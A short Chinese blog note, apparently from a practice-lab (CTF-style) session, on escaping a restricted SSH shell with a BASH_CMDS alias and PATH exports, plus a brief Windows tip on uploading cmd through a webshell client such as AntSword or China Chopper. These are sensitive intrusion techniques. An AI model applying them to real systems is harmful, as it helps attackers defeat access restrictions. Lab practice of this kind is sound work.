zoukankan
html css js c++ java
小记如何绕过受限的shell
今天的靶场登陆ssh后发现shell受限,如下
woami都执行不了,查看对应的bin目录,发现只能执行4个命令
在网上学到一招可以绕过这种受限制的被阉割的shell
BASH_CMDS[a]=/bin/sh;a #把/bin/bash给a变量
/bin/bash
echo $0 #查看脚本本身的名字
echo $? #命令执行结果反馈,0代表执行成功,其余数字表示不成功
export PATH=$PATH:/bin/ #将/bin 作为PATH环境变量导出
export PATH=$PATH:/usr/bin #将/usr/bin作为PATH环境变量导出
执行完上面加粗的四步之后就可以执行所有命令了
Windows中如果遇到此类情形
1.找到一处可上传文件的位置上传cmd
2.蚁剑可以自定义cmd的环境变量
使用菜刀同样上传cmd文件
设置cmd环境变量 终端输入 set cmd文件的物理地址
查看全文
相关阅读:
DeFi之道丨科普:一分钟了解以太坊layer2扩容
4.B-Air302(NB-IOT)-功能扩展-Android扫码绑定Air302,并通过MQTT实现远程控制和监控PLC(三菱Fx1s-10MR)
Air302(NB-IOT)-硬件BUG-电路硬件错误及其修改说明
4.2-Air302(NB-IOT)-自建MQTT服务器-Android扫码绑定Air302,并通过MQTT实现远程通信控制
Android 开发:数据库操作-android 使用 litepal 操作本地数据库
0.5-Air302(NB-IOT)-连接自建MQTT服务器
0.1-Air302(NB-IOT)-刷AT指令固件
STM32+ESP8266+AIR202基本控制篇-00-开发板回收说明
21-STM32+ESP8266+AIR202/302远程升级方案-扩展应用-移植远程升级包实现STM32F407VET6+串口网络模组(ESP8266/Air202/Air302)使用http或者https远程升级单片机程序
数据处理思想和程序架构: 单片机STM32F407xx/F405xx/F415xx/417xx系列flash存储方案
原文地址:https://www.cnblogs.com/sup3rman/p/12392161.html
最新文章
[AWS] IAM -- create user and attach policy
[AWS] Lab
[AWS] Create MySQL database in RDS and connect from local / EC2
[AWS DA
C++ core dumped 文件产生并调试
python ctypes 混合编程 suds webservices api调用
地理国情监测
live cd 定制
Centos系统备份恢复
pytorch numpy tensorflow
热门文章
AMD ATI nvidia opencl CUDA intel CPU GPU
this 指针
数字货币量化搬砖套利详解
HashKey:盘点加密货币套利机会与 DeFi 套利趋势
8 Best Cryptocurrency Trading Bots [Free, Paid, Open-Source] For 2021
4 Best Cryptocurrency Arbitrage Bot Platforms For 2021
9种分布式ID生成方式
学习统计学,必看的书单推荐
Cannot move out of captured outer variable in an Fn closure
Why Decentralized Economics Enable Creators to Thrive
Copyright © 2011-2022 走看看